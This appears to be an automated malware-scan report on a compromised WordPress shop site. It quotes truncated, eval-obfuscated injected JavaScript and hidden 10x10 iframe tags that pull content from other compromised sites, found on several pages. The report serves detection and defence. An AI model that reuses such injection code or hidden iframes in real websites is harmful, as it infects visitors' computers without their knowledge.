Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=queenpillows.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://queenpillows.com/ | 200 OK Content-Length: 53983 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/] ...[3887 bytes skipped]... Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b ...[16212 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 10x10 src: http://38hartrobertsroad.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://38hartrobertsroad.com/wp-content/plugins/rotr" frameborder="0"> Malicious iFrame found. The same iFrame was found in 15 websites. size: 10x10 src: http://1mypham.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://1mypham.com/wp-content/plugins/rotr" frameborder="0"> | ||
http://queenpillows.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/x-javascript | clean |
http://queenpillows.com/wp-content/themes/kaboodle/includes/js/superfish.js?ver=3.3.2 | 200 OK Content-Length: 2770 Content-Type: application/x-javascript | clean |
http://queenpillows.com/wp-content/themes/kaboodle/includes/js/general.js?ver=3.3.2 | 200 OK Content-Length: 2038 Content-Type: application/x-javascript | clean |
http://queenpillows.com/wp-content/themes/kaboodle/includes/js/jcarousellite.min.js?ver=3.3.2 | 200 OK Content-Length: 2383 Content-Type: application/x-javascript | clean |
http://queenpillows.com/wp-content/themes/kaboodle/includes/js/slides.min.jquery.js?ver=3.3.2 | 200 OK Content-Length: 6908 Content-Type: application/x-javascript | clean |
http://queenpillows.com/wp-content/themes/kaboodle/includes/js/jquery.prettyPhoto.js?ver=3.3.2 | 200 OK Content-Length: 31006 Content-Type: application/x-javascript | clean |
http://queenpillows.com/wp-content/themes/kaboodle/includes/js/portfolio.js?ver=3.3.2 | 200 OK Content-Length: 2590 Content-Type: application/x-javascript | clean |
http://queenpillows.com/wp-content/themes/kaboodle/includes/js/jquery.cycle.all.min.js?ver=3.3.2 | 200 OK Content-Length: 32046 Content-Type: application/x-javascript | clean |
http://queenpillows.com/contact-us/ | 200 OK Content-Length: 49902 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/] ...[3887 bytes skipped]... Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b ...[16212 bytes skipped]... Antivirus reports:
Malicious iFrame found. The same iFrame was found in 15 websites. size: 10x10 src: http://1mypham.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://1mypham.com/wp-content/plugins/rotr" frameborder="0"> Malicious iFrame found. size: 10x10 src: http://38hartrobertsroad.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://38hartrobertsroad.com/wp-content/plugins/rotr" frameborder="0"> | ||
http://queenpillows.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/x-javascript | clean |
http://queenpillows.com/page-1/ | 200 OK Content-Length: 52056 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/] ...[3887 bytes skipped]... Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b ...[16212 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 10x10 src: http://38hartrobertsroad.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://38hartrobertsroad.com/wp-content/plugins/rotr" frameborder="0"> Malicious iFrame found. The same iFrame was found in 15 websites. size: 10x10 src: http://1mypham.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://1mypham.com/wp-content/plugins/rotr" frameborder="0"> | ||
http://queenpillows.com/page-5/ | 200 OK Content-Length: 52191 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/] ...[3887 bytes skipped]... Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b ...[16212 bytes skipped]... Antivirus reports:
Malicious iFrame found. The same iFrame was found in 15 websites. size: 10x10 src: http://1mypham.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://1mypham.com/wp-content/plugins/rotr" frameborder="0"> Malicious iFrame found. size: 10x10 src: http://38hartrobertsroad.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://38hartrobertsroad.com/wp-content/plugins/rotr" frameborder="0"> | ||
http://queenpillows.com/page-3/ | 200 OK Content-Length: 52101 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/] ...[3887 bytes skipped]... Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b ...[16212 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 10x10 src: http://38hartrobertsroad.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://38hartrobertsroad.com/wp-content/plugins/rotr" frameborder="0"> Malicious iFrame found. The same iFrame was found in 15 websites. size: 10x10 src: http://1mypham.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://1mypham.com/wp-content/plugins/rotr" frameborder="0"> | ||
http://queenpillows.com/page-2/ | 200 OK Content-Length: 52062 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/] ...[3887 bytes skipped]... Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b ...[16212 bytes skipped]... Antivirus reports:
Malicious iFrame found. The same iFrame was found in 15 websites. size: 10x10 src: http://1mypham.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://1mypham.com/wp-content/plugins/rotr" frameborder="0"> Malicious iFrame found. size: 10x10 src: http://38hartrobertsroad.com/wp-content/plugins/rotr This URL is marked by Google as suspicious <iframe width="10" height="10" src="http://38hartrobertsroad.com/wp-content/plugins/rotr" frameborder="0"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: queenpillows.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 17:25:26 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://queenpillows.com/xmlrpc.php
GET / HTTP/1.1
Host: queenpillows.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 17:25:26 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://queenpillows.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: queenpillows.com
Referer: http://www.google.com/search?q=queenpillows.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: queenpillows.com
Referer: http://www.google.com/search?q=queenpillows.com
Result:
The result is similar to the first query. There are no suspicious redirects found.